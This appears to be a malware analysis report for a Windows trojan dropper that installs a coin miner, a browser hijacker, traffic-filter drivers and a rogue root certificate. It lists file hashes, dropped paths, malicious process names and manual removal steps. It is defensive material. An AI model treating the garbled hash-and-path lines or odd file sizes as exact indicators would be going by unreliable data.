4a55c7ba203a42c5f6014fa68c221b02c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\240714_ps[1].exe
28f4a2d3d12718e2be4df161203da4adc:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\291014_nj[1].exe
02cb66123e29291d26ec629ae644e0b3c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_cp[1].exe
fddf4c9d5bdf47f6638a1405cab91044c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_mb[1]
1b99adddd28023e61c2a23c13cd855cfc:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_a9[1].exe
7b828bdd47d8ccfc1cc421befa0420ffc:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_gs[1]
86efd8c3d12bf831f3d2a7e29fe282aac:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_is[1]
d1b659d5e028009b62b337d5bbdf6787c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\cpuminer-x11opt-setup[1].exe
348109d7b5f154f9722c63b53ed7a600c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\310714_br[1].exe
41be921214a9653b77b80086b4c5a7a5c:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ChromeSync.exe
183ce47148c66717fbcd147a41a0caf6c:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ClearnC.exe
a96619564071df84cc892752df062a6dc:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\RegWrite.exe
e7b4b146a101093e11ce45d203dd907bc:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\XTab_Setup2253.exe
8a8f5ebe2fd9c2e6325723209b9cdf32c:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.2227.exe
86efd8c3d12bf831f3d2a7e29fe282aac:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\310714_is.exe
fddf4c9d5bdf47f6638a1405cab91044c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvt_mb_1.exe
1b99adddd28023e61c2a23c13cd855cfc:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe
d61776c4928db339475ab6a773585c9dc:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe
02cb66123e29291d26ec629ae644e0b3c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe
4a55c7ba203a42c5f6014fa68c221b02c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe
aff6e78398132094f1e26605275eb44ac:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe
871bd80009fa0011b2de2ab0f9b82d6cc:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\15094FED_stp.EXE
2db34c7d07707168429b0b2633ff75c0c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\sqlite3.dll
c17103ae9072a06da581dec998343fc1c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\System.dll
d7a3fa6a6c738b4a3c40d5602af20b08c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\inetc.dll
84bcf3c71e70d5a6e9dc07d70466bdc3c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\nsWeb.dll
2b7007ed0262ca02ef69d8990815cbebc:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\registry.dll
faa7f034b38e729a983965c04cc70fc1c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll
84bcf3c71e70d5a6e9dc07d70466bdc3c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll
2b7007ed0262ca02ef69d8990815cbebc:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\registry.dll
9163a02f8cf9071e609ee20b1a4868b2c:\Users\"%CurrentUserName%"\AppData\Roaming\cpuminer\cpuminer-uninst.exe
a5bfd6a87161d5dfa81cb5c2c6d29488c:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    ProtectService.exe:3580
    ProtectService.exe:3668
    g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884
    ProtectWindowsManager.exe:3736
    ProtectWindowsManager.exe:3316
    import_root_cert.exe:3188
    15094FED_stp.EXE:3668
    cpuminer-x11opt-setup.exe:3752
    DesProtetor.exe:536
    wpm_v20.0.0.2227.exe:3268
    g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948
    QQBrowser.exe:3824
    QQBrowser.exe:3212
    g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816
    powershell.exe:3772
    powershell.exe:3656
    powershell.exe:3376
    g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe:3564
    g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe:3480
    XTab_Setup2253.exe:1748
    cmdshell.exe:3596
    g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe:3400
    amisid.exe:3516
    g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe:4024
    nfregdrv.exe:3588
    nfregdrv.exe:3076
    nfregdrv.exe:1648
    nfregdrv.exe:3924
    nfregdrv.exe:3192
    HPNotify.exe:3640
    CashReminder.exe:3984
    g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe:1520
    ActSys.exe:148
    certutil.exe:3280
    g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe:3268
    amisetup2899__9664.exe:3368
    GOSafer.exe:3264
    WNet.exe:4016
    310714_is.exe:948

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Program Files% (x86)\XTab\msvcp110.dll (536 bytes)
    %Program Files% (x86)\XTab\msvcr110.dll (876 bytes)
    %Program Files% (x86)\XTab\CmdShell.exe (32 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\mt-core[1].js (42633 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\contabilizar[1].htm (162 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[1] (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\icone_cadeado[1].gif (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\verificar_ip[1].htm (105 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\error[1] (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll (20 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\i[1].gif (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\top-line[1].gif (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\8Hk4o[1].htm (185 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\SL2[1].gif (43 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\carregando[1].gif (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\s9[1].gif (43 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\warning[1] (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310113f8[1].htm (1006 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\010914i[1].htm (308 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BD.tmp (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\MobiMidia_validation[1].js (865 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\150814c[1].htm (637 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\carregando3[1].gif (1 bytes)
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\up[1].htm (1 bytes)
    C:\ProgramData\WindowsMangerProtect\update\conf (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\certutil.exe (90 bytes)
    %Program Files% (x86)\DesProtetor\uninst.exe (1305 bytes)
    %Program Files% (x86)\DesProtetor\nfregdrv.exe (1601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2A2C.tmp (74611 bytes)
    %Program Files% (x86)\DesProtetor\ssleay32.dll (12088 bytes)
    %Program Files% (x86)\DesProtetor\nfapi.dll (4992 bytes)
    %Program Files% (x86)\DesProtetor\desprotetordrv.sys (1856 bytes)
    C:\Windows\System32\drivers\desprotetordrv.sys (51 bytes)
    %Program Files% (x86)\DesProtetor\libeay32.dll (35507 bytes)
    %Program Files% (x86)\DesProtetor\DesProtetor.exe (15982 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\SimpleSC.dll (1921 bytes)
    %Program Files% (x86)\DesProtetor\ProtocolFilters.dll (9320 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\CPUFeatures.dll (20 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\System.dll (23 bytes)
    C:\Windows\System32\cpuminer-gw64.exe (41231 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll (12 bytes)
    C:\Windows\System32\cpuminer-conf.json (420 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\cpuminer\cpuminer-uninst.exe (1279 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\UserInfo.dll (8 bytes)
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[5].txt (111 bytes)
    C:\Windows\Temp\P_RuleList.txt (111 bytes)
    C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe (2444 bytes)
    %Program Files% (x86)\ActSys\asfilterdrv.sys (1856 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\smime3.dll (3616 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SelfDel.dll (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\softokn3.dll (12536 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nspr4.dll (6360 bytes)
    %Program Files% (x86)\ActSys\ssleay32.dll (12088 bytes)
    %Program Files% (x86)\ActSys\remove_ActSys.exe (313 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\System.dll (23 bytes)
    C:\Windows\System32\drivers\asfilterdrv.sys (56 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\mozcrt19.dll (23936 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\nsExec.dll (14 bytes)
    %Program Files% (x86)\ActSys\ProtocolFilters.dll (38495 bytes)
    %Program Files% (x86)\ActSys\ActSys.exe (15990 bytes)
    %Program Files% (x86)\ActSys\libeay32.dll (35507 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SimpleSC.dll (1921 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscF0B5.tmp (140252 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plc4.dll (784 bytes)
    %Program Files% (x86)\ActSys\nfregdrv.exe (1601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nss3.dll (12536 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\NJaxIntermediate.cer (774 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plds4.dll (784 bytes)
    %Program Files% (x86)\ActSys\nfapi.dll (4992 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\import_root_cert.exe (3406 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\RegWrite.exe (86 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.2227.exe (676 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ChromeSync.exe (286 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\XTab_Setup2253.exe (148 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\479.db (288 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WebDataJs (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ClearnC.exe (114 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\icon.png (628 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\index.html (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js (784 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\aes.js (784 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code1.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\default_logo.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery.autocomplete.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\479.json (512 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\newtab.ico (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\xagainit.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\mostgrid.js (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code2.jpg (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\misc.js (11 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button1.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\settings.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\google_trends.png (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\common.js (10 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox_select.png (783 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\MessageBox.xml (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code5.jpg (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en-US\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\js.js (660 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pl\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg1.png (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\simple.css (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CH\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bk_shadow.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\preferences.js (379 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_bg.png (159 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\scrollbar.bmp (37 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\addonmanager.js (531 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code4.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-TW\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code3.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\install.rdf (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code6.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\doT.min.js (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\hotSearch.js (6 bytes)
    C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\min.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\googlelogo.png (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-LU\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-BE\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowserFrame.dll (110 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\misc.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\uninstallDlg2.xml (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\stat.js (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\vi\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\tr\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checked.png (222 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\restoreprefs.js (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox.png (545 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome.manifest (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\properties.js (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\ga.js (1552 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (486 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\logo.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg.png (673 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\about_blank_hook.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery-2.1.0.min.js (3312 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\popup_image_helper.js (693 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_light.png (139 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pt-BR\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\unchecked.png (135 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.js (784 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\urlrequestor.js (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\search.js (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\last_tab.js (4 bytes)
    C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\style.css (784 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it\locale.properties (1 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it-CH\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe (14022 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\83B.tmp (110 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\Thumbs.db (42 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\speed_dial.js (1 bytes)
